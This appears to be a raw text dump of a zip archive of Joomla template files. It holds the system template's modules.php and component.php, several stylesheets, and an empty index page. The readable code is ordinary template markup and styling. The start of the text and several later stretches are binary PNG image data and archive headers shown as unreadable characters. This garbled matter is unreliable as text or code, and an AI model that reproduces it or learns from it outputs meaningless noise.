�|���L���(���/n��P?Xl	�1�����'�ß������ɒ{��%������?`���L;��:l���ڡB+m�[F�'��O�e��#L|�EV�8�\ʻ�΁�mC��#顬�2�{�gc=9^��?y�`�R&�����:���⎬��pJ�g旦<{ty��}��^�����]���c��=�~G�ᦆvv�cݱ���czR�;sv�d-��N�;roH��vv�,_��b��OY��l�����R���WY��ġpյ �8BB��}�#���,g�^�(7�r���v��䱉��\Ͱ�;�HbL�= �;&���V�:V�!~j���d�AAo�N�+�B0�
��#�P��_[���G!�SN8\�{��Ԏ݇F�/p	�����%��Mx�<�z���+�D�µq����^.�|���7�25ha���u?����0	��!�E���87���2��F�Pa��Pc��$=t&�|��p����d��ɲmj�?��SH�q�����!HXX\o��K���`RP� �s�j��?����(\5H�#�1�����I�B�8��:�o�(�)�u�=��/7gwtdž�־Ng��bC�}KƑrA��G�r��pm7��V@ka�m[1MlYZ��
7�4�u[�ӟ4�@�rE"�p4�ӏZ)[ߚ�_]�'iF�50��Vd�ġpU�㙚�RZ���(�µQ�έ��ww<?Y��xI�.���_���~�-��돟(�c�cK�}|�^|���Ku?�6��b�B8Ed�b��S�B���7D�@�G��%7������ZBO}�٪���E��b��S'+�r3  �%cOժ'�-*o�v�c�����u�.�H�x�'��(�P��z
0�L՛)�@9!�cxp�!�CH�y�-�k�dV��#q�����t͛�{�@:i�����'��~����:S� ;�X}9�R#(�����P�3�A�?-�z(��Pm��h�^l	��e!}"���Tն4!^�k�M2[��ҵ@
�����)�P�:�!�<^�UGm��i�����F򣅦�4,���.�-4�� �J82��0��8�M�c�f�(�Ei��7
�8��US�7���#��l��fѐ�$����r��5q(�!�޴�7g�%b�%b¯�4�N�u�Ҭ	;��
f�~.��-MO���y��B�L�X��	]P
'�[eLͥ��B�.�4�
�0��35!�
��Rq(\"Jp��=��Z���m��g����?a����1��B3�[�����h6a���o�Յ���޸�S��؉�+xg4m�pMD�`’4S�~0]�k�]S�᢯b
E
��KF5F����xR�p��F��pac��	F�/7����Z�
�]�-e�5�jś��&�'m]nQ��A�3� L�`9�%�
a�e|u�bE
�- l��Y�7��R��j^�� �p�	�'Kn�X�P�Ӥ�Hx7�p�g[A�ң��EU��S7�)(�P�A�C�N���s.>�C�S���$�%M
!�q3B9�)l�V��u�U=B9P�Ԕġp3�r�(�F�Q�cK�tE
780���?B��$L]n�Qͪ�C��V8Ҧ�0�̪��\i|��
���O?SC��b+X�;t��WE
g��FF��C��+�Q�M
^�C'r*���]x���a��8ۮ�v��G��b�	C��(a��P����΢���X�� �\���6�ܻ�IM���Eҩ���@�]�`�Q�a*��m戄�p�rP�0ܞ�5���\�p!P�:�Xz�����r3��FN��"��	y�V���,P-�(⸦�<���׿���������X�0���!�����Έ�`ܶa=u����h�a�Nִ;�=w4�r��Ԋd�2nh��]��}��'�>��9�B�@��R�2((#���ղ1�Nٟ�4��ә2Tc��#��E�b�~��_��'?YXZ�t��:<C<�u-�L���)��Ҏ�����u1�`*���J͖ż��x���^W��û�ܱ�`��11r9�lj��+� �Cja�09’K
-��i���->����
�QNIAE�8�*����?�����F���Ϝ�(cb~L8�a�`uރ�.X�pV~�g~|���z��_Z�r1F֞C5{Ӕ�3o1�q�t}3O7}����+�t����<ZqIt#�UN�6F��*2���@�6�y��RD�rOO�&mJ�Jq\=z�R�
���;h,��vVB
V]�a�K�/�D�L&��E����#Y�ih��"�#_�5TO���=�37�j�d'���p�`h�h�AlUp�@�n���W���eg�MQ��&����x[X��� @�l��(�E�FUAc�^��q��
A�t�P���2�
��p�]fX)SC�q��P�������$	׈�b&%bq k]��RVG($�}��d��WT�	�� �d� d�zY'-�g1�NZL��Q;��x��必�
�9�MR�A;�	I���
�T�d#�L*�E��D���С�Qq�����`���P:��/7Cq�8�Q[ұ�=fhq)��U=�-)+�c-�A+���[
��\�'n�����7aibR>VhL׽�c�fb��y��5\��,���MZG���Y�����ț�FP�(��x����e�K+R�0�1��ܡ������R��	��鬢3R��||�Ґ�8�B��	���/T�b�50LZ���	�KɁ�
��[+�
!k��Rs���N(D�Pu�����K-7L��Q�B���Ѧ��C0]�J
A::�x��G���x�E�R7�wJ�P�q-� �C�X#Vmb1)�W,�.'�0�� ����*�ey8L&N	�kW&\i!	�ZAĉAhq�D
V�'�� ����Y�oJS��'�-e��}]��wV~��8����Ր�%�or��E3R�/��Nw�ª�M��*�����&���qxE��SZ���
�])j����4�ȯT�Jq�q8��2��H'�&�1�ˆ�A���Ŋ�T菡΢�Jq\?}�1^j����C�j��o|�:K�B��+���yA�?^¿�?BYD���)w�ܱ�W�a[��U!v�Z��8���m�?Mz�v~�@��$Ȱp��cp�މ'0ƌ]���n-��f��m+�Pܡ����5Ĉ=��WYy>4~�=���`)5`-��bv��鼥9an�QhT�L�ؑ#��\IS�Fw���=����;;;q\�Qn���Y�������,\�D��s�c��un�Ww�I�����<����%AҶ���C���x����oP���6Yo	]ų��2ŷ���_��_.��ԧti�W����t�;��q-u��|��/`Ck��O��
Hv gB�h��k�ނ�:\N�<��Fǂn�rYK�d8��.so�:�D���ۛVW�#�B�o���(�x����a�2CCO=���=��SO?��q(�P��C�O]PgAz
X/�e�<�(Ÿ�kp�/�¬V+��Y��5����Ǜ������K�̀�Ճ���L('=�y�
���>e���#M�����řҢ�@��A�)�)1�jF�*��8�f��H�L711������Pqǵ�Y."�1y֨Q02�hu���ԭ�+M�p�'�(��5E�E
!�'��\#�L��Be%��rc��3�<�u�G�Հ1���Bp�4��8C��4�M�>���*pG��u�uw\;�\��r�Րɥ"�RG�r���pLj�-Rh��L��V|Z�����U�J�WT�t���M�]�b�ě�D+��S� �1l���,�P�qrG+�r��vS\#��en���/ů�;�4ɀr.x��s��DLK��5�!�%|�10�D*:�O�t��!�w#��%\y�\+�*��.m�m;q��N�7Z��k�
��2q�`��Q�ג;���	��J���B��+��QR�q�uRn��9%Oq���q�-��d�W�l�wdb���h����:����rG�E!���صH9'=�d�r6wx��l6ſ�bQ�IM��r���񆵛*�8�;��'�k�����F�;$w�!w�M�!w�>��#���#���Yj�WY1Z���/|��G�\�\.�4��өݻw��/���Ȉ"�k��b��?��F�^l��;d���~g���_:B�3~�����_<!TtsQ�Q�C2ZgW�;�c��b���g��EZ�t���9���q��=*�e\������ѣG'''?���ڱ��q\m�td���A��j�FKC)��=��AL�*���=�W�K����u[6�)z�e�Y�ֵ�����+�#C�6"wT]���]�;hãWi�Ez�8�b}~�7�t+� ]7c��m�FHBU_���SO=��|K7t_v�==�����[` �0���ތ��c��Iӂ��H�,�N��޸��P�=[2�'�r�86�f(]�����䞜7�{�f�č0⟴f1�r&��Ӿ=g���O���&�1�z��L��TO6�5�xe�ýj��q<���c,2[D����֭[���{z���~ZTj5��\��'����{�zG��������rS�lxL�m#�.K��ziQ�	e(��k�7�'s&ꈛ,_��l����.՟��~���w��g-�L|GW<c��K��V�����-��Bë)���O��ٰ���"��r�BZ��%�����D�o6�4H�R�(�����¬�L	��/ȨPqް��7��#`|,ks��>�4(7�����vʚ}�@�'J_˗~vo�ɪ7��	"�|c_����wl͞(���b9[�%W��ۆҷ���.�ˠ�<������°�"��/���XoL���GJ���y��
�.q�|{�䎫c�=��V��&�M�H��Xn�L��2�@6J��
���������-
=;Wy�d�t�qk��ٻ�޶��o��ÛD˖mYq�I�t�~�mf\���������P�}�>��}(0�i�iR�-&��xNJc[�.$E��\��k�C�K�)�<�@����|����k-�".mF5���}fQ̕r,B)�¬�`f��@L�T��|�n�%������{��7�&J��h#�%�0o��f��W�_4������`��\�d��L�*6M[:�HX9�;;�y�C��J&��_�
 H��fA����Δ�1߈�&�X�2�3s!P�[[|��?
���y��Ob��cy��_Ozu�~g���Q7�qا��w��/W����\��{��˽Xb��0^ףė��vR�Q��^��j-���]�>�š�,�Q'Z,�wׁ���P� �@�8��JB���<��Vg�qAE<M�C+�d�װJ��<"r���U�/��A�w!{�����Im����1�� /rC�Ԓ��gѭ���3f��om�=�J$AF>S�O�򕒽(2��(��4�6"�y��M?[��"Sx}30�]rh̷�C4�������M��T��S��1�ɳ>���0�Ш؟�y�d��;k�b@���h3@=�w=��˵ǝ詟ۈ���Y��n��aXn���K���S�P��Vj��&V4�ui�a�:�B���|3�5Ϻ1SzڏW�f��:ƣ��zI���M)��ߜ�^��a�Y3�rx��]�ؠ:��Tb�NhƦߝ)���#?u(��A�0d�cS!ۘjo�8��B[�&�^�sۑ�8ےE(���=����УkO��|�E��`���Q��l�^*�D\�8����f�*1�s������ϔ�/;qh����;�h��o�Ǒ�;zf0�XDM���<�}㜫R�/$��RŚ���R ԝ�&r��Ś���P�Zz�k?y�K+��ޜ�,��E���r�2c�ڌ{w#�M3�Rs6��\`,����$.=�0�>�1��0mx��'�B�4�ܽ(Y�5_>g�i��'��z͞)[����'������N�.V����KN�TC�Bņ����C��o��\��OUw��>�����]U���hX�lz�l/T�E��{6<������\�z��Y��V$�~;l���+5dz�K�c��/����z�m���Nd�G�����W���G�r����IĎ�>rN�/��>l�3��ph���ndBj�sac�U/��bؼJ6H��CB�a RC=L�y�p ����v��Z��Oz�v^�;�P͐�Ƅ^�^s)1]\��\d��1jb#�&� +���;��&��P�5_����,�����?�X�`�W��|�򸰘c�9���	Ži�UQH'R�j������M�`_0��=���fߥ�1��E^!�"�e��%sN���b#,@�����+����a}��"�pd�O��K�>Y��K��n6���V 25�?���>\J�h��\�:Zq��Q�����ޠ���I�E�۷bH�
��q�#؏���"�vt��(�����}ŲD����G���N"�M],����k�hxu��3����p1�bXťA"-l���C���g}��"��˞9�Z��R��i�KzK�
���4�-m4T�묔���yh�"E�1��S�gp���������J��	%��֜e��J[�Ś ��bƱ@��Ur�՚
\�oN�X�����A75W	L�ҁ��4��C�b�r#���p�TI��v3Q"/V��Þ�pL�hўMk���r��k׀�`4�P����5v�c�A0��
�����IJl��cRʯ<��pG��M���Ov���:�^�i���R��vdb��Yن�1�X�K,�����Wk�����[�+�5wi3��R�d-�%Lt��x�T�1��Q��2�r֦��B9�m�{͸,5��Q"t�"�԰b�x`�e�ch5`d��_�}���ܜ��bY�x�anpεR��������z��q�\��$%֒���2����]�	,�&�:�]r�~����_���K#.S���f�eB���F�5J��g���e��crh2�-o]�ݼX&E��,
*��7�H�*v��BO���so#̩�Vްaa�~пq��_����vʃ>��7��߯T*��V��4'~�^��WK�9��k����	�Ѱ�v��\�����K���}�buR�\�핊˥�b9@ZQRDŽ����>��Y�I���,�$O��m
�HXT�h�jw�A�B���3R
)�} � s�c���)(� "N]L����T�=b�Bϖ��EgY�j��2�&�)1��l��H���X'_��P�ԉ�����b�ݦ��e��zo4a����8Nm	�k�W�s.-�*��6�%�m39`TEj��;T� ���/�*�u���r;��`?.t�F+~��j߆I�eɦ����j
%�ܶH���}2�TEB�(SBt�&���1'8�
~��X�/� BhwB��k�†a6�ӥn��O��c�f����Sj���Sы<��'�ߑ}�Kɫ�Rá	(b.]���p[#�! �q�1����l��v�,�*��M@w�^���2�P��Gm
C���4Zd�#; S-�'�pQ��{��FI>��ho1�qh,���"`G�g�xi�\A{ N�T1��2G�_���x+�`h��	�#?iʟ�?-�=.��;B����1�Ԑ|���w*d�#HO#_�~�Rǔ�Sn<F�h��$:G�a��kp�w������g=��;
�v�3ǎ�q�Q��a��ϔw�r>Ov���Sӆ�3���1D���…��8
��|�g���a�N$Ď,e:�2=�8
;:=v(��C��Y8�Rjں7�N�f)�ct�!v��cLj)���3�������Z3K[��0��/eB���3+Q"���qiU4s�NF�c�
)�hG����qÎndJz6}�Y׸��\��]£���0����R���R�xP̵��XrM>p�X;�P��4F3H���dZzv`�,Zi���_�0d9�|�t|{W�r�y�}o��K�4)M-���&����!I1e��2��1�����cj�c;��G���<9K|���<p`��t�Az8t����0-��hV.�a�k%��K&�I��u�l�9��D�B8�k�GK|
8�c�Ϡj�49h�뺧"X�
�%���$F���)#��[��)�"�������WRQ�m���>W�@i]rx.�"��^RBa�(��h��oܼy�?�{�r�GGZ�a0��	E*I�j�
��r0aݺukqq��!z�^�$g��`�;QT��NN=*�����A9�����7��I�G��	-�Ւk�9XW�F��e������Ki�./?m�ۖ�v7 cO�YG�k������g?���hd��0��
z��̲N��F�J�a�{�ƍV����~�,˺07g(�"Q��V�3\��$��6 �W*��:W�|��o��W��t:p5�aa׺�������9��`R�������]��20J�칹V���_�o�[�_ͳDY�]���a��F�牨Vk����{��k�k2Z��Sq�1J�~�*o����E
��qf2�	���h��
x�l���J�$�ɏ�?���7�M�� ������ٙ��x�^ØA��6��Qĵ�/5;��B��й;G`�̌�K�/�������r!`h�M�wVQ��3�~&�1�F��ä��_��y^cvֶ,����a���`�x�3� [�VO؛ U��֖���
oO�^/!@5�G}�O��E����-C���k���Nh��ǵk��y�ܾ=�_����O��0W��ޛ��#��m	�^گ����a�g�Q
x�w����ͥ�%�LN��<�1k,9�?�{,z�����vS�AAH�k�qh������Y@��q0	5*2t�xm�t���	|�N
�"�na�vT�U4Aa�VGa�VGa�VGa�VGa�VGa�V�!���n_�P��IEND�B`�PKԜ�\�#o,,purity_iii/index.htmlnu&1i�<html><body bgcolor="#FFFFFF"></body></html>PKԜ�\�V�
index.htmlnu�[���<!DOCTYPE html><title></title>
PKԜ�\}A�system/html/modules.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Template.system
 *
 * @copyright   (C) 2006 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/*
 * none (output raw module content)
 */
function modChrome_none($module, &$params, &$attribs)
{
	echo $module->content;
}

/*
 * html5 (chosen html5 tag and font header tags)
 */
function modChrome_html5($module, &$params, &$attribs)
{
	$moduleTag      = htmlspecialchars($params->get('module_tag', 'div'), ENT_QUOTES, 'UTF-8');
	$headerTag      = htmlspecialchars($params->get('header_tag', 'h3'), ENT_QUOTES, 'UTF-8');
	$bootstrapSize  = (int) $params->get('bootstrap_size', 0);
	$moduleClass    = $bootstrapSize !== 0 ? ' span' . $bootstrapSize : '';

	// Temporarily store header class in variable
	$headerClass    = $params->get('header_class');
	$headerClass    = !empty($headerClass) ? ' class="' . htmlspecialchars($headerClass, ENT_COMPAT, 'UTF-8') . '"' : '';

	if (!empty ($module->content)) : ?>
		<<?php echo $moduleTag; ?> class="moduletable<?php echo htmlspecialchars($params->get('moduleclass_sfx', ''), ENT_COMPAT, 'UTF-8') . $moduleClass; ?>">

		<?php if ((bool) $module->showtitle) :?>
			<<?php echo $headerTag . $headerClass . '>' . $module->title; ?></<?php echo $headerTag; ?>>
		<?php endif; ?>

			<?php echo $module->content; ?>

		</<?php echo $moduleTag; ?>>

	<?php endif;
}

/*
 * Module chrome that wraps the module in a table
 */
function modChrome_table($module, &$params, &$attribs)
{ ?>
	<table cellpadding="0" cellspacing="0" class="moduletable<?php echo htmlspecialchars($params->get('moduleclass_sfx', ''), ENT_COMPAT, 'UTF-8'); ?>">
	<?php if ((bool) $module->showtitle) : ?>
		<tr>
			<th>
				<?php echo $module->title; ?>
			</th>
		</tr>
	<?php endif; ?>
		<tr>
			<td>
				<?php echo $module->content; ?>
			</td>
		</tr>
		</table>
	<?php
}

/*
 * Module chrome that wraps the tabled module output in a <td> tag of another table
 */
function modChrome_horz($module, &$params, &$attribs)
{ ?>
	<table cellspacing="1" cellpadding="0" width="100%">
		<tr>
			<td>
				<?php modChrome_table($module, $params, $attribs); ?>
			</td>
		</tr>
	</table>
	<?php
}

/*
 * xhtml (divs and font header tags)
 * With the new advanced parameter it does the same as the html5 chrome
 */
function modChrome_xhtml($module, &$params, &$attribs)
{
	$moduleTag      = htmlspecialchars($params->get('module_tag', 'div'), ENT_QUOTES, 'UTF-8');
	$headerTag      = htmlspecialchars($params->get('header_tag', 'h3'), ENT_QUOTES, 'UTF-8');
	$bootstrapSize  = (int) $params->get('bootstrap_size', 0);
	$moduleClass    = $bootstrapSize !== 0 ? ' span' . $bootstrapSize : '';

	// Temporarily store header class in variable
	$headerClass    = $params->get('header_class');
	$headerClass    = $headerClass ? ' class="' . htmlspecialchars($headerClass, ENT_COMPAT, 'UTF-8') . '"' : '';

	if (!empty ($module->content)) : ?>
		<<?php echo $moduleTag; ?> class="moduletable<?php echo htmlspecialchars($params->get('moduleclass_sfx', ''), ENT_COMPAT, 'UTF-8') . $moduleClass; ?>">
			<?php if ((bool) $module->showtitle) : ?>
				<<?php echo $headerTag . $headerClass . '>' . $module->title; ?></<?php echo $headerTag; ?>>
			<?php endif; ?>
			<?php echo $module->content; ?>
		</<?php echo $moduleTag; ?>>
	<?php endif;
}

/*
 * Module chrome that allows for rounded corners by wrapping in nested div tags
 */
function modChrome_rounded($module, &$params, &$attribs)
{ ?>
		<div class="module<?php echo htmlspecialchars($params->get('moduleclass_sfx', ''), ENT_COMPAT, 'UTF-8'); ?>">
			<div>
				<div>
					<div>
						<?php if ((bool) $module->showtitle) : ?>
							<h3><?php echo $module->title; ?></h3>
						<?php endif; ?>
					<?php echo $module->content; ?>
					</div>
				</div>
			</div>
		</div>
	<?php
}

/*
 * Module chrome that add preview information to the module
 */
function modChrome_outline($module, &$params, &$attribs)
{
	static $css = false;

	if (!$css)
	{
		$css = true;
		$doc = JFactory::getDocument();

		$doc->addStyleDeclaration('
		.mod-preview {
			background: rgba(100,100,100,.08);
			box-shadow: 0 0 0 4px #f4f4f4, 0 0 0 5px rgba(100,100,100,.2);
			border-radius: 1px;
			margin: 8px 0;
		}
		.mod-preview-info {
			padding: 4px 6px;
			margin-bottom: 5px;
			font-family: Arial, sans-serif;
			font-size: .75rem;
			line-height: 1rem;
			color: white;
			background-color: #33373f;
			border-radius: 3px;
			box-shadow: 0 -10px 20px rgba(0,0,0,.2) inset;
		}
		.mod-preview-info span {
			font-weight: bold;
			color: #ccc;
		}
		.mod-preview-wrapper {
			margin-bottom: .5rem;
		}
		');
	}
	?>
	<div class="mod-preview">
		<div class="mod-preview-info">
			<div class="mod-preview-position">
				<?php echo JText::sprintf('JGLOBAL_PREVIEW_POSITION', $module->position); ?>
			</div>
			<div class="mod-preview-style">
				<?php echo JText::sprintf('JGLOBAL_PREVIEW_STYLE', $module->style); ?>
			</div>
		</div>
		<div class="mod-preview-wrapper">
			<?php echo $module->content; ?>
		</div>
	</div>
	<?php
}
PKԜ�\猽V�
�
system/css/general.cssnu�[���/**
 * @copyright	(C) 2006 Open Source Matters, Inc. <https://www.joomla.org>
 * @license		GNU General Public License version 2 or later; see LICENSE.txt
 */

/* Form validation */
.invalid { border-color: #ff0000; }
label.invalid { color: #ff0000; }

/* Buttons */
#editor-xtd-buttons {
	padding: 5px;
}

.button2-left,
.button2-right,
.button2-left div,
.button2-right div {
	float: left;
}

.button2-left a,
.button2-right a,
.button2-left span,
.button2-right span {
	display: block;
	height: 22px;
	float: left;
	line-height: 22px;
	font-size: 11px;
	color: #666;
	cursor: pointer;
}

.button2-left span,
.button2-right span {
	cursor: default;
	color: #999;
}

.button2-left .page a,
.button2-right .page a,
.button2-left .page span,
.button2-right .page span {
	padding: 0 6px;
}

.page span {
	color: #000;
	font-weight: bold;
}

.button2-left a:hover,
.button2-right a:hover {
	text-decoration: none;
	color: #0B55C4;
}

.button2-left a,
.button2-left span {
	padding: 0 24px 0 6px;
}

.button2-right a,
.button2-right span {
	padding: 0 6px 0 24px;
}

.button2-left {
	background: url(../images/j_button2_left.png) no-repeat;
	float: left;
	margin-left: 5px;
}

.button2-right {
	background: url(../images/j_button2_right.png) 100% 0 no-repeat;
	float: left;
	margin-left: 5px;
}

.button2-left .image {
	background: url(../images/j_button2_image.png) 100% 0 no-repeat;
}

.button2-left .readmore,
.button2-left .article {
	background: url(../images/j_button2_readmore.png) 100% 0 no-repeat;
}

.button2-left .pagebreak {
	background: url(../images/j_button2_pagebreak.png) 100% 0 no-repeat;
}

.button2-left .blank {
	background: url(../images/j_button2_blank.png) 100% 0 no-repeat;
}

/* Tooltips */
div.tooltip {
	float: left;
	background: #ffc;
	border: 1px solid #D4D5AA;
	padding: 5px;
	max-width: 200px;
	z-index:13000;
}

div.tooltip h4 {
	padding: 0;
	margin: 0;
	font-size: 95%;
	font-weight: bold;
	margin-top: -15px;
	padding-top: 15px;
	padding-bottom: 5px;
	background: url(../images/selector-arrow.png) no-repeat;
}

div.tooltip p {
	font-size: 90%;
	margin: 0;
}

/* Caption fixes */
/* Caption fixes */
.img_caption .left {
        float: left;
        margin-right: 1em;
}

.img_caption .right {
        float: right;
        margin-left: 1em;
}

.img_caption .left p {
        clear: left;
        text-align: center;
}

.img_caption .right p {
        clear: right;
        text-align: center;
}

.img_caption  {
	text-align: center!important;
}

.img_caption.none {
	margin-left:auto;
	margin-right:auto;
}


/* Calendar */
a img.calendar {
	width: 16px;
	height: 16px;
	margin-left: 3px;
	background: url(../images/calendar.png) no-repeat;
	cursor: pointer;
	vertical-align: middle;
}
PKԜ�\�/Z�system/css/offline_rtl.cssnu�[���/**
 * @copyright	(C) 2008 Open Source Matters, Inc. <https://www.joomla.org>
 * @license		GNU General Public License version 2 or later; see LICENSE.txt
 */

 /**
 * Joomla! 1.5 Offline RTL css file
 *
 * @package				Joomla
 * @since				1.5
 * @version				1.0
 */

#frame form{ text-align: right; }
label { float:right; }
fieldset.input p {clear: right;}

/* -- message styles ----------------------------------- */
.alert {
	padding: 8px 8px 25px 14px;
	text-align: right;
}
.alert .close {
	float: left;
	left: -20px;
	right: 0px;
}PKԜ�\L
z¡�system/css/editor.cssnu�[���/**
 * @copyright	(C) 2005 Open Source Matters, Inc. <https://www.joomla.org>
 * @license		GNU General Public License version 2 or later; see LICENSE.txt
 */

body {
	background: #fff;
	font-family: Tahoma, Helvetica, Arial, sans-serif;
	line-height: 1.3em;
	font-size: 76%;
	color: #333;
}

h1 {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 16px;
	font-weight: bold;
	color: #666;
}

h2 {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 14px;
	font-weight: normal;
	color: #333;
}

h3 {
  font-weight: bold;
  font-family: Arial, Helvetica, sans-serif;
  font-size: 13px;
  color: #135cae;
}

h4 {
	font-weight: bold;
	font-family: Arial, Helvetica, sans-serif;
	color: #333;
}

a:link, a:visited {
	color: #1B57B1; 
	text-decoration: none;
	font-weight: normal;
}

a:hover {
	color: #00c;	
	text-decoration: underline;
	font-weight: normal;
}

div.caption       { padding: 0 10px 0 10px; }
div.caption img   { border: 1px solid #CCC; }
div.caption p     { font-size: .90em; color: #666; text-align: center; }

/* STYLES FOR JOOMLA! EDITOR */
hr#system-readmore  { border: red dashed 1px; color: red; }
hr.system-pagebreak { border: gray dashed 1px; color: gray; }
PKԜ�\��C��system/css/offline.cssnu�[���/**
 * @copyright	(C) 2005 Open Source Matters, Inc. <https://www.joomla.org>
 * @license		GNU General Public License version 2 or later; see LICENSE.txt
 */

body {
	margin: 0; padding: 0;
	font-family: Arial, Helvetica, Sans Serif; font-size: 14px;
	color: #333333;
	text-align: center;
}

img  {
	border: 0 none;
	margin-left: auto;
	margin-right: auto;
}

/* -- id styles ------------------------------------- */

#frame {
	margin: 20px auto;
	max-width: 400px;
	padding: 20px;
}

#frame img {
	max-width: 100%;
	height: auto;
}

#frame form {
	text-align: left;
}

/* -- class styles ---------------------------------- */

.outline {
	border: 1px solid #cccccc;
	background: #ffffff;
	padding: 2px;
}

/* -- form styles ----------------------------------- */

form {
	margin: auto;
}

form br {
	display: none;
}

form p {
	margin: 0;
	padding: 0.5em 0 0.5em 0;
}

form fieldset {
	border: 0 none;
	margin: 0em;
	padding: 0.2em;
}

label {
	display: block;
	margin: 5px 0 2px 0;
}

input {
	box-sizing: border-box;
	width: 100%;
	padding: 5px 10px;
	border: 1px solid #0E67A1;
	font-size: inherit;
	font-family: inherit;
}

input.button {
	width: auto;
	cursor: pointer;
	background-color: #006dcc;
	border-color: #04c;
	color: #fff;
	-webkit-appearance: none;
}

input.button:hover {
	background-color: #04c;
}

fieldset.input p {
	clear: left;
}

#frmlogin {
	margin: 0 10px 0 10px;
}

#frmlogin fieldset.button {
	text-align: right;
}

/* -- message styles ----------------------------------- */

#system-message {
	margin: 0 auto;
	padding: 20px 0 0;
	max-width: 445px;
}

.alert {
	background: none repeat scroll 0 0 #FFFFFF;
	border: 1px solid #CCCCCC;
	padding: 8px 25px 8px 14px;
	text-align: left;
}

.alert h4 {
	color: red;
	margin: 5px 0;
}

.alert p {
	padding: 0px;
	margin: 0px;
}

.alert .close {
	float: right;
	font-size: 24px;
	line-height: 18px;
	position: relative;
	right: -20px;
	top: -2px;
	cursor: pointer;
}
.login {
	margin-top: 5px;
}
PKԜ�\���4SSsystem/css/toolbar.cssnu�[���/**
 * @copyright	(C) 2006 Open Source Matters, Inc. <https://www.joomla.org>
 * @license		GNU General Public License version 2 or later; see LICENSE.txt
 */

div.toolbar-list {
	margin-right: 10px;
	float: right;
	text-align: right;
}

div.toolbar-list a {
	color : #808080;
	text-decoration : none;
	display: block;
	float: left;
	border: 1px solid #DDD;
	width: 40px;
	padding: 2px 5px 2px 5px;
}
div.toolbar-list a:hover {
	color : #C64934;
	cursor: pointer;
	border: 1px solid #c24733;
	background-color: #f1e8e6;
	padding: 3px 5px 1px 5px;
}
div.toolbar-list a:active {
	color : #FF9900;
}PKԜ�\+|��qqsystem/css/system.cssnu�[���/**
 * @copyright	(C) 2007 Open Source Matters, Inc. <https://www.joomla.org>
 * @license		GNU General Public License version 2 or later; see LICENSE.txt
 */

/* Import project-level system CSS */
@import url(../../../media/system/css/system.css);

/* Unpublished */
.system-unpublished, tr.system-unpublished {
	background: #e8edf1;
	border-top: 4px solid #c4d3df;
	border-bottom: 4px solid #c4d3df;
}

span.highlight {
	background-color:#FFFFCC;
	font-weight:bold;
	padding:1px 0;
}

.img-fulltext-float-right {
	float: right;
	margin-left: 10px;
	margin-bottom: 10px;
}

.img-fulltext-float-left {
	float: left;
	margin-right: 10px;
	margin-bottom: 10px;
}

.img-fulltext-float-none {
}

.img-intro-float-right {
	float: right;
	margin-left: 5px;
	margin-bottom: 5px;
}

.img-intro-float-left {
	float: left;
	margin-right: 5px;
	margin-bottom: 5px;
}

.img-intro-float-none {
}PKԜ�\`�����system/css/error.cssnu�[���/**
 * @copyright	(C) 2005 Open Source Matters, Inc. <https://www.joomla.org>
 * @license		GNU General Public License version 2 or later; see LICENSE.txt
 */

/* Start Common Styles */
* {
	font-family: helvetica, arial, sans-serif;
	font-size: 11px;
	color: #5F6565;
}

html {
	height: 100%;
	margin-bottom: 1px;
}

body {
	margin: 0px;
	padding: 0px;
	height: 100%;
	margin-bottom: 1px;
	background: #FFFFFF;
	font-family: helvetica, arial, sans-serif;
	font-weight: normal;
	padding-top: 0px;
	margin-top: 0px;
}

.error {
	margin-left: auto;
	margin-right: auto;
}

table, td, th, div, pre, blockquote, ul, ol, dl, address,.componentheading,.contentheading,.contentpagetitle,.sectiontableheader,.newsfeedheading {
	font-family: helvetica, arial, sans-serif;
	font-weight: normal;
}

#outline {
	width: 900px;
	margin: 0 auto;
	padding: 0px;
	padding-top: 60px;
	padding-bottom: 60px;
	background: #FFFFFF;
}
#errorboxoutline {
	width: 900px;
	margin: 0px;
	padding: 0px;
	border: 1px solid #000000;
}
#errorboxheader {
	width: 900px;
	margin: 0px;
	padding: 0px;
	background: #E44249;
	color: #FFFFFF;
	font-weight: bold;
	font-size: 12px;
	line-height: 22px;
	text-align: center;
	border-bottom: 1px solid #000000;
}
#errorboxbody {
	margin: 0px;
	padding: 10px;
	text-align: left;
}
#techinfo {
	margin: 10px;
	padding: 10px;
	text-align: left;
	border: 1px solid #CCCCCC;
	color: #CCCCCC;
}
#techinfo p {
	color: #CCCCCC;
}PKԜ�\]��;;system/css/error_rtl.cssnu�[���/**
 * @copyright	(C) 2011 Open Source Matters, Inc. <https://www.joomla.org>
 * @license		GNU General Public License version 2 or later; see LICENSE.txt
 */

/* Start Common Styles */

body {
	text-align: right;
}

.TD{
	text-align: left;
}

#errorboxbody {
	text-align: right;
}
#techinfo {
	text-align: right;
}
PKԜ�\�+�366system/component.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Template.system
 *
 * @copyright   (C) 2005 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/** @var JDocumentHtml $this */

// Output as HTML5
$this->setHtml5(true);

// Add html5 shiv
JHtml::_('script', 'jui/html5.js', array('version' => 'auto', 'relative' => true, 'conditional' => 'lt IE 9'));

// Styles
JHtml::_('stylesheet', 'general.css', array('version' => 'auto', 'relative' => true));
?>
<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
	<jdoc:include type="head" />
</head>
<body class="contentpane">
	<jdoc:include type="message" />
	<jdoc:include type="component" />
</body>
</html>
PKԜ�\�#V��!system/images/j_button2_right.pngnu�[����PNG


IHDR�F1kIDATx��D��
www�;�d�Te`�һG�Rxn���/�ma��Kg�J��f�t;�
�v�]̀t��~t���n���
H�L���HG�@��J�t7��UKX��?ҭt+��'���B�����0JϘ�IEND�B`�PKԜ�\=F��$system/images/j_button2_readmore.pngnu�[����PNG


IHDRK�l�IDATx��Ez�@�aݬ�G�]�ef�M�9f�A,��� ���@��|[�3Fba�8��e��h�ۈ��p�^���HQT.�ۚX<p���
